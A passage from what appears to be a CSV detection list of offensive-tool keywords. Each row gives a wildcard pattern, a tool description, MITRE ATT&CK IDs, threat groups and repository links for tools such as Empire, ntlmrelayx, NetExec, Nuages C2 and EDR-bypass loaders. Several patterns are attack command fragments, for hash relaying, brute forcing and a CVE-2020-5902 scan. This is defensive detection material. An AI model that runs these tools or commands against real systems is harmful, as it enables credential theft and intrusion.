Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*NTLMChallengeBase64*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Tater.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*NTLMChallengeBase64*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*ntlm-info.py*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z"
+"*ntlmquic.*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z"
+"*ntlmquic-go*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB 
over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z"
+"*ntlmquic-master*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z"
+"*ntlmrecon *","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","0","N/A","N/A","5","419","67","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z"
+"*ntlmrecon.csv*","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","5","419","67","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z"
+"*ntlmrecon:main*","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","0","N/A","8","1","32","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z"
+"*ntlmrecon-fromfile.csv*","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. 
Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","5","419","67","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z"
+"*NTLMRecon-master*","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","8","1","32","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z"
+"*ntlmrecon-ranges.csv*","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","5","419","67","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z"
+"*NTLMRelay2Self.git*","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","1","N/A","10","4","349","45","2022-04-30T19:02:06Z","2022-04-30T10:05:02Z"
+"*ntlmrelayx -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*ntlmrelayx --*","offensive_tool_keyword","AD exploitation cheat sheet","Example command to relay the hash to authenticate as local 
admin (if the service account has these privileges) and run calc.exe. Omit the -c parameter to attempt a secretsdump instead.","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*ntlmrelayx.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*ntlmrelayx.py.log*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z"
+"*ntlmscan.py*","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","303","52","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z"
+"*ntlmscan-master.zip*","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","303","52","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z"
+"*ntlmv1.py --ntlmv1 
*::*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z"
+"*ntlmv1.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*ntlmv1_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*ntlmv1-multi --ntlmv1 *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*NtoskrnlOffsets.csv*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" 
+"*NtRemoteLoad-main*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z"
+"*ntrights.exe*","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","7","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
+"*NtUserMNDragOverExploit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*NtWa1tF0rS1ngle0bj3ct Executed*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","0","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" +"*Nuages*/Implants*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*nuages.clearImplants *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*nuages.getAutoruns*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*nuages.getImplants*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 
- T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*nuages.getListeners*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*nuages.printImplants*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*nuages.printListeners*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*nuages_cli.js*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*NuagesC2Connector*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*NuagesC2Implant*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*NuagesPythonImplant*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*NuagesSharpImplant*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*nuclei -t workflows/bigip-pwner-workflow.yaml*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*nuclei -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*nuclei-burp-plugin*","offensive_tool_keyword","Xerror","A BurpSuite plugin intended to help with nuclei template generation.","T1583 T1595 T1190","N/A","N/A","N/A","Network Exploitation 
tools","https://github.com/projectdiscovery/nuclei-burp-plugin","1","1","N/A","N/A","10","955","102","2023-09-15T10:49:09Z","2022-01-17T10:31:33Z" +"*Nuke_Privileges /Process:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*NUL0x4C/APCLdr*","offensive_tool_keyword","APCLdr","APCLdr: Payload Loader With Evasion Features","T1027 - T1055 - T1055.002 - T1055.003 - T1070 - T1070.004 - T1071 - T1106 - T1574.001","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/NUL0x4C/APCLdr","1","1","N/A","N/A","3","285","51","2023-01-22T04:24:33Z","2023-01-21T18:09:36Z" +"*NUL0x4C/AtomLdr*","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","543","78","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" +"*null-byte.com/bypass-amsi*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*NullSessionScanner.*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/vletoux/pingcastle","1","1","N/A","N/A","10","1860","249","2023-09-18T17:29:51Z","2018-08-31T17:42:48Z" +"*nxc ftp *bruteforce*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc http *--port*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc ldap * --admin-count*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc ldap * --trusted-for-delegation*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc mssql *--get-file*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 
- T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc mssql *--local-auth*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc ssh *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc winrm * -X *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc*nxcdb.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxcdb-zipapp-*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory 
networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nysm.skel.h*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*nysm-master.zip*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","1","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*nyxgeek*","offensive_tool_keyword","Github Username","github user hosting exploitation and recon tools","N/A","N/A","N/A","N/A","Information Gathering","https://github.com/nyxgeek","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*nyxgeek/lyncsmash*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*nyxgeek/ntlmscan*","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","303","52","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" +"*nyxgeek/teamstracker*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - 
TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" +"*-o kitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*o_getprivs*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*o365-Attack-Toolkit*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. 
It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" +"*o365-attack-toolkit*","offensive_tool_keyword","o365-attack-toolkit","A toolkit to attack Office365","T1110 - T1114 - T1119 - T1197 - T1087.002","TA0001 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/o365-attack-toolkit","1","1","N/A","10","10","955","218","2020-11-06T12:09:26Z","2019-07-22T10:39:46Z" +"*o365creeper.git*","offensive_tool_keyword","o365creeper","Python script that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Network Exploitation tools","https://github.com/LMGsec/o365creeper","1","1","N/A","N/A","3","265","57","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z" 